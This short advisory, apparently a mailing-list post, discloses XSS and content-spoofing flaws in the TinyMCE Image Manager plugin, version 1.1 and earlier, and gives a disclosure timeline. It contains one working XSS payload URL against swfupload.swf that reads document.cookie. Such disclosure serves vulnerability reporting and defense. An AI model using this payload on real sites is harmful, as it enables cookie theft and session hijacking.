Hello 3APA3A!
These are Cross-Site Scripting and Content Spoofing vulnerabilities in TinyMCE Image Manager plugin for TinyMCE.
Vulnerable are TinyMCE Image Manager 1.1 and previous versions.
Dustweb
http://dustweb.ru/projects/tinymce_images/
Cross-Site Scripting (WASC-08):
http://site/path/images/js/swfupload/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//
Content Spoofing (WASC-12):
2013.05.18 - announced at my site.
2013.05.18 - informed developer.
2013.07.12 - disclosed at my site (http://websecurity.com.ua/6517/).
Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua